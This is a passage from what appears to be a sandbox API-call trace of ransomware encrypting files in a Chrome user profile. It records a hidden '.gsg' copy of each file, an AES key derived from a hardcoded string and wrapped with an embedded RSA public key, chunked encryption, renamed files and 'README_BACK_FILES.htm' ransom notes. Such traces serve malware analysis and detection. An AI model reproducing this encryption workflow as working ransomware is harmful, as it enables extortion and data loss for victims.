pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.585] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.585] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x2b9, lpOverlapped=0x0) returned 1 [0264.585] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x2b9, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x2c0) returned 1 [0264.585] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x2c0, lpOverlapped=0x0) returned 1 [0264.585] CloseHandle (hObject=0x5d60) returned 1 [0264.585] CloseHandle (hObject=0x5d64) returned 1 [0264.585] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json"), bFailIfExists=0) returned 1 [0264.588] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json", dwFileAttributes=0x0) returned 1 [0264.589] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.gsg")) returned 1 [0264.591] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.fuck")) returned 1 [0264.592] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0264.592] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0264.592] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0264.592] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0264.592] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0264.592] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\readme_back_files.htm")) returned 0xffffffff [0264.592] AreFileApisANSI () returned 1 [0264.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3508, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 160 [0264.593] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0264.593] GetFileType (hFile=0x5d50) returned 0x1 [0264.593] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0264.594] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0 [0264.594] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0264.595] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\readme_back_files.htm")) returned 0xffffffff [0264.595] AreFileApisANSI () returned 1 [0264.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 150 [0264.595] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d604, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0264.596] GetFileType (hFile=0x5d4c) returned 0x1 [0264.596] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c250*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c248, lpOverlapped=0x0 | out: lpBuffer=0x2b9c250*, lpNumberOfBytesWritten=0x2b9c248*=0x5ec, lpOverlapped=0x0) returned 1 [0264.597] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0264.597] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0264.597] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\readme_back_files.htm")) returned 0xffffffff [0264.597] AreFileApisANSI () returned 1 [0264.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2eb5740, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 135 [0264.597] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0264.598] GetFileType (hFile=0x5d40) returned 0x1 [0264.598] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0264.599] FindNextFileA (in: hFindFile=0x29388b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.599] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\Temp\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x2e7fc00 [0264.600] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.600] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0264.600] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0264.600] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\Temp\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\temp\\readme_back_files.htm")) returned 0xffffffff [0264.600] AreFileApisANSI () returned 1 [0264.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0264.600] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\Temp\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\temp\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0264.601] GetFileType (hFile=0x5d40) returned 0x1 [0264.601] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0264.602] FindNextFileA (in: hFindFile=0x29388b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0264.602] FindClose (in: hFindFile=0x29388b8 | out: hFindFile=0x29388b8) returned 1 [0264.602] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\readme_back_files.htm")) returned 0xffffffff [0264.602] AreFileApisANSI () returned 1 [0264.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0264.603] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0264.603] GetFileType (hFile=0x5d48) returned 0x1 [0264.604] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0264.604] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.605] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.605] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.605] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0264.605] GetLastError () returned 0x0 [0264.605] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico")) returned 0x20 [0264.605] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico", dwFileAttributes=0x80) returned 1 [0264.606] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0264.607] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0264.609] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.gsg", dwFileAttributes=0x2) returned 1 [0264.609] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2e796a8) returned 1 [0264.611] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0264.611] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0264.611] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.611] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2e7fc40) returned 1 [0264.611] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.611] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0264.612] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2e7a3f0) returned 1 [0264.612] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7a3f0, dwCertEncodingType=0x1, pInfo=0x2eaf640*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaf670*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaf678*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2e7fd40) returned 1 [0264.612] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0264.612] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7a478*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2e7a478*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0264.612] WriteFile (in: hFile=0x5d40, lpBuffer=0x2e7a478*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2e7a478*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0264.613] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.618] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.618] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.626] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.627] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.627] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.628] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.628] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.628] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.628] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.628] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.628] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.628] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.628] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.628] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.628] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.628] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.628] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.629] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.629] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.629] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.629] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.629] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.629] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.629] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.629] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.629] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.629] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.629] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.629] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.629] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.630] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.630] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: 